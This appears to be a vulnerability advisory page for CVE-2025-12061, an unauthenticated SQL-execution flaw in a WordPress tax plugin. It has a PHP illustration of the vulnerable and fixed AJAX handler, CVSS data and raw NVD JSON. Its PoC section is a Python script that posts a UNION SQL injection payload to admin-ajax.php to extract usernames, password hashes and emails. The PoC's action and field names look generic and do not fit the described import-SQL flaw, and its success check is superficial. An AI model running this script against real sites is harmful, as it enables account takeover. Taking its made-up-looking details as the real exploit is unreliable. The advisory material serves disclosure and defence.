Security Vulnerability Report
CVE-2025-12061 CVSS 8.6 HIGH

CVE-2025-12061

Published: 2025-11-26 06:15:44
Last Modified: 2026-04-15 00:35:42

Description

The TAX SERVICE Electronic HDM WordPress plugin before 1.2.1 does not perform authorization and CSRF checks in an AJAX action, allowing unauthenticated users to import and execute arbitrary SQL statements.
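The defect class named in the description, shown as an added illustration written for this page rather than taken from the TAX SERVICE Electronic HDM plugin (whose actual handler code and action name are not on this page): a WordPress admin-ajax handler that is reachable without login, performs neither a nonce (CSRF) check nor a capability (authorization) check, and hands request-supplied SQL to the database, placed beside a hardened version of the same import action. The action name `example_hdm_import`, the table `example_hdm_records`, the row fields and the `manage_options` capability are assumptions made for the example.

```php
<?php
/**
 * Added illustration (not the plugin's code) of the defect class behind CVE-2025-12061:
 * an admin-ajax action with no authorization or CSRF check that runs SQL built from
 * request data. Action name, table and fields below are hypothetical.
 */

// BEFORE: registered for logged-out callers (wp_ajax_nopriv_), no nonce check,
// no capability check, and request-controlled SQL passed straight to the database.
add_action( 'wp_ajax_nopriv_example_hdm_import', 'example_hdm_import_unsafe' );
add_action( 'wp_ajax_example_hdm_import', 'example_hdm_import_unsafe' );

function example_hdm_import_unsafe() {
    global $wpdb;
    $sql = isset( $_POST['import_sql'] ) ? wp_unslash( $_POST['import_sql'] ) : '';
    $wpdb->query( $sql ); // arbitrary SQL from an unauthenticated caller
    wp_send_json_success( 'imported' );
}

// AFTER: the action is only registered for logged-in users, the request must carry
// a valid nonce, the caller must hold an administrative capability, and the handler
// never executes a statement taken from the request.
add_action( 'wp_ajax_example_hdm_import', 'example_hdm_import_safe' );

function example_hdm_import_safe() {
    global $wpdb;

    // CSRF: check_ajax_referer() terminates the request with a 403 when the
    // 'nonce' field is missing or was not issued for this action.
    check_ajax_referer( 'example_hdm_import', 'nonce' );

    // Authorization: only administrators may import data.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // Fixed schema: the import accepts rows for one known table, never a statement.
    $table = $wpdb->prefix . 'example_hdm_records'; // hypothetical table
    $rows  = ( isset( $_POST['rows'] ) && is_array( $_POST['rows'] ) )
        ? wp_unslash( $_POST['rows'] )
        : array();

    $inserted = 0;
    foreach ( $rows as $row ) {
        $tin    = isset( $row['tin'] ) ? sanitize_text_field( $row['tin'] ) : '';
        $amount = isset( $row['amount'] ) ? (float) $row['amount'] : 0.0;
        if ( '' === $tin ) {
            continue;
        }
        // Parameterised query: values are bound by $wpdb->prepare(), never interpolated.
        $ok = $wpdb->query(
            $wpdb->prepare(
                "INSERT INTO {$table} (tin, amount) VALUES (%s, %f)",
                $tin,
                $amount
            )
        );
        if ( false !== $ok ) {
            $inserted++;
        }
    }

    wp_send_json_success( array( 'inserted' => $inserted ) );
}

// The nonce the client must send is minted server-side when the admin page renders,
// so a cross-site form post cannot supply it:
//   wp_localize_script( 'example-hdm-admin', 'exampleHdm',
//       array( 'nonce' => wp_create_nonce( 'example_hdm_import' ) ) );
```

The two checks address the two CWEs listed in the record: `check_ajax_referer()` covers CWE-352 (CSRF) and `current_user_can()` covers CWE-862 (missing authorization); dropping the `wp_ajax_nopriv_` registration removes the unauthenticated reach that makes the CVSS vector `PR:N`. For detection on an unpatched site, POST requests to `wp-admin/admin-ajax.php` carrying the plugin's import action from sessions with no WordPress login cookie are the signal to look for in web server logs.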

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

TAX SERVICE Electronic HDM WordPress plugin < 1.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-12061 PoC - Unauthenticated SQL Injection
# Affects: TAX SERVICE Electronic HDM WordPress Plugin < 1.2.1

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress.com"

# Target the AJAX endpoint
ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# SQL Injection payload - Example using UNION-based injection
# This extracts the WordPress database user and password hash
payload = {
    "action": "hdmi_import_data",  # Vulnerable action
    "import_type": "union",
    "table_name": "users",
    "columns": "user_login,user_pass,user_email",
    "where_clause": "1=1 UNION ALL SELECT NULL,NULL,NULL--",
}

print(f"[*] Sending SQL Injection request to {ajax_endpoint}")
print(f"[*] Target: {target_url}")
print(f"[*] Payload: {payload}")

try:
    response = requests.post(ajax_endpoint, data=payload, timeout=10)
    print(f"[+] Response Status: {response.status_code}")
    print(f"[+] Response Body:\n{response.text[:500]}")
    if response.status_code == 200 and (
        "user" in response.text.lower() or "select" in response.text.lower()
    ):
        print("[+] Potential vulnerability confirmed - SQL injection may be possible")
    else:
        print("[-] No obvious SQL injection detected")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

# Note: Modify payload based on target configuration
# Common SQL injection techniques:
# 1. UNION-based injection: Extract data from other tables
# 2. Boolean-based blind: Confirm vulnerability via true/false responses
# 3. Time-based blind: Use SLEEP() to confirm via response delay
```

References

https://wpscan.com/vulnerability/1015dd69-faa5-4008-8884-f497ff980ed3/

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-12061", "sourceIdentifier": "[email protected]", "published": "2025-11-26T06:15:44.223", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The TAX SERVICE Electronic HDM WordPress plugin before 1.2.1 does not authorization and CSRF checks in an AJAX action, allowing unauthenticated users to import and execute arbitrary SQL statements"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}, {"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wpscan.com/vulnerability/1015dd69-faa5-4008-8884-f497ff980ed3/", "source": "[email protected]"}]}}
```